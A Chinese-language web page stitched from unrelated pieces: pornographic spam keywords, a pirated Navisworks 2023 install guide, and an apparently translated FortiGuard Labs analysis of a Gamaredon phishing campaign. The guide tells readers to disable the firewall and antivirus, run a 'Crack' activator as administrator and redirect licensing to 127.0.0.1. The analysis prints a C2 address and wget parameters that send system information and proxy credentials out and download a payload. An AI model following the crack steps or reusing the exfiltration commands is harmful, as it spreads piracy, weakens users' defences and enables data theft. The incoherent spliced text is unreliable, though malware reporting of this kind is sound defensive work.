操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    [軟件名稱]:Navisworks2023

    [軟件語言]:簡體中文

    [軟件大小]:3.2G

    [推薦安裝環境]:Win11/Win10

    [硬件要求]:CPU@3GHz 內存@8G(或更高)

    Autodesk Navisworks軟件能夠將AutoCAD和Revit系列等應用創建的設計數據,與來自其它設計工具的幾何圖形和信息相結合,將其作為整體的三維項目,通過多種文件格式進行實時審閱,而無需考慮文件的大小。Navisworks軟件產品可以幫助所有相關方將項目作為一個整體來看待,從而優化從設計決策、建筑實施、性能預測和規劃直至設施管理和運營等各個環節。(本文素材來自于互聯網,僅供交流學習使用)


    安裝步驟

    1.鼠標右擊【Navisworks2023】壓縮包選擇【解壓到Navisworks2023】文件夾。(溫馨提示:解壓前關閉防火墻和殺毒軟件,解壓軟件建議用Winrar或者Bandizip)



    2.知識兔打開解壓后的文件夾,雙擊打開【Navisworks2023】文件夾,雙擊打開【Setup】文件夾,。



    3.鼠標雙擊【Autodesk_Navisworks_Manage_2023_Win_64bit_dlm_001_002.sfx】。


    4.選擇目標文件夾,點【確定】。



    5.解壓中,請耐心等待解壓完成。



    6.點【我同意使用條款】,再點【下一步】。


    7.選擇好【產品安裝位置】,點【安裝】。



    8.等待軟件安裝過程。



    9.點【X】退出。



    10.打開【Crack】文件夾。


    11.鼠標右擊【Crack】選擇【以管理員身份運行】



    12.耐心等待激活(激活成功后自動退出)。



    13.雙擊軟件桌面快捷方式,打開軟件。



    14.點【選擇】(如果之前電腦上裝過這個軟件的新版本,那么14、15步是不會彈出來的)。



    15.服務器名稱中輸入【127.0.0.1】,然后點【確定】。



    16.軟件安裝成功,軟件主界面如下圖所示。


    如果覺得軟件對您有用就知識兔

    最近,FortiGuard Labs發現黑客組織Gamaredon發起了一場新的惡意攻擊活動,目標很可能是烏克蘭執法部門和政府機構。

    需要說明的是,從2013年年中開始,該組織就一直在針對烏克蘭政府和軍方發起魚叉式網絡釣魚攻擊。一旦收件人打開了惡意附件,他們就能通過包含在其中的一些批處理命令文件來部署可遠程操控受感染系統的二進制文件。

    最新活動分析

    惡意附件是一個自解壓壓縮文件,主要包含了如下幾個文件(從命名上來看,都與烏克蘭的軍事沖突有關):

    • 1_Миротворець\заява.jpg
    • 2_Пiнчук\Пiнчук Андрiй Юрiйович 27.12.1997.docx
    • 3_Хавченко\Хавченко Дмитро Василiйович 06.01.1966.docx
    • D3i_GMCWAAAq_8u.jpg
    • ssu_zakon.docx
    • 多個文本文件

    圖1.惡意附件包含的文件

    不知為何,所有文本文件都包含一些很早以前的電話賬單信息,以及坐標、號碼和地址。

    圖2.文本文件包含的賬單信息

    ssu_zakon.docx被用作誘餌,內容是關于烏克蘭安全局(SSU)法律的說明。

    圖3. ssu_zakon.docx的內容

    另外兩個Office文檔2_Пiнчук\Пiнчук Андрiй Юрiйович 27.12.1997.docx

    和3_Хавченко\Хавченко Дмитро Василiйович 06.01.1966.docx,雖然命名采用的是烏克蘭文,但內容卻是使用俄文寫的,并且是完全根據誘餌文檔ssu_zakon.docx的內容翻譯過來的。

    圖4.文檔內容

    文件1_Миротворець\заява.jpg和D3i_GMCWAAAq_8u.jpg內容完全相同,原圖來自Mirotvorets(“和平締造者”)網站上的一篇文章,該網站以發布那些被認為是“烏克蘭的敵人”的人的個人信息而聞名。

    圖片上的文字討論了克里米亞、軍事沖突以及涉嫌在背后贊助烏克蘭現任總統沃洛迪米爾·澤倫斯基(Volodymyr Zelensky)的兩個人。

    圖5.圖片內容

    漏洞利用分析

    分析表明,惡意附件實際上包含了能夠利用WinRAR unacev2.dll模塊漏洞的概念驗證腳本(于2019年2月27日被公開發布在Github上)。

    圖6. unacev2.dll漏洞POC

    這個腳本會釋放三個文件,每一個都對應一款軟件。

    首先,一個名為“Goggle Chrome.lnk”的快捷方式文件會被放置在用戶的桌面上。如圖11所示,攻擊者似乎想要將它偽裝成谷歌瀏覽器,但命名出現了拼寫錯誤。

    圖7.存在拼寫錯誤的快捷方式

    然后,一個相同的快捷方式文件將會被放置在“AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”文件夾中,用于實現持久性。只要用戶登錄系統,它就會自動執行。

    最后,一個名為“win.exe”的可執行文件將會被放置在“userprofile”文件夾中。

    win.exe可執行文件分析

    win.exe實際上是一個受密碼保護的自解壓RAR壓縮文件,并且包含有合法微軟工具SysInternals Autoruns的偽造數字簽名。

    圖8.虛假數字簽名

    如圖9所示,win.exe包含有另外一個名為“winlog.exe”的可執行文件,以及一個SFX腳本。

    圖9.win.exe的內容

    winlog.exe實際上是一個7zip SFX壓縮文件,其中包含了兩個文件:5532.cmd和config.exe,一個命令提示符(批處理文件)和一個可執行文件。

    圖10.winlog.exe的內容

    首先,5532.cmd會配置一些變量——一個硬編碼的C2服務器地址、文件名和用戶代理:

    • hxxp://lisingrout.ddns[.]net
    • librelogout.exe
    • "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Firefox/27.0"

    接下來,它會從注冊表項“HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings”中提取代理信息,然后進行保存:

    • ProxyServer(代理服務器地址)
    • ProxyUser(代理用戶名)
    • ProxyPass(代理密碼)

    然后,它會獲取計算機的名稱并生成唯一ID。完成后,它會調用systeminfo并將整個輸出保存到文本文件中。

    圖11.初始數據收集代碼

    在等待40秒后,它將通過啟動ping命令(ping –n 14 google.com)向google.com發送14個請求來檢查網絡連接。

    完成后,它會使用配置中指定的文件名(“librelogout.exe”)終止任務并刪除該文件。

    最后,它會通過config.exe將收集到的出初始數據上傳到C2服務器:

    • --user-agent = [hardcoded UA]
    • --post-data=”
    • versiya=wrar
    • comp=%computername%
    • id=[generated from computer name]
    • sysinfo=[data from ohJlkad.txt]”
    • “[C2 Server]”
    • -q -N “[C2 Server]”
    • -O “librelogout.exe”

    如果用戶是通過代理連接到互聯網的,它還會通過config.exe上傳額外的一些數據:

    • -e
    • --http_proxy=http://[Proxy Server]
    • --proxy-user=[Proxy username]
    • --proxy-password=[Proxy password]

    在C2服務器做出響應后,腳本將從C2服務器下載并啟動主有效載荷。

    值得一提的是,config.exe實際上是一個合法的wget版本(v 1.11.4),支持為Windows編譯的OpenSSL,編譯時間可以追溯到2009年。顯然,攻擊者仍然選擇的是使用一個開源工具來發動攻擊。

    結論

    在這場活動中,Gamaredon犯了太多低級的錯誤:

    • 首先,沒有對批處理文件進行混淆處理,這使得它很容易被分析;
    • 其次,快捷方式中的路徑包含了用戶名、文件夾和文件名,這些信息都可以用來揭露開發者的身份;
    • 最后,大部分數據都是使用俄文編寫的,而不是烏克蘭文。

    普遍使用開源工具,再結合以上信息,FortiGuard Labs認為Gamaredon很有可能不是一個得到國家資助的黑客組織,甚至不是一個專業的黑客組織。此外,很有可能來自俄羅斯。

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有